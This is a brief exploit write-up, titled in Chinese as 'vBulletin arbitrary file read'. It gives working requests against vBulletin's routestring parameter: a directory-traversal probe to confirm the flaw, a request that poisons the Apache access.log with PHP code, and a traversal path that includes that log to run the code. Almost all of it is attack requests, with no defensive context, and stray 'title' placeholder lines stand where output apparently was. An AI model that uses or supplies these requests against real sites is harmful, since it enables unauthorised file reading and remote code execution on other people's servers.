vBulletin读任意文件

We can check if the server is vulnerable by sending the following GET request:

/index.php?routestring=.\\

If the response is:

title

The server is vulnerable.

If we want to inject a php code to any file on the server we can use the access.log for example:

/?LogINJ_START=<?php phpinfo();?>LogINJ_END

After that we can include access.log with our PHP code:

/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log

title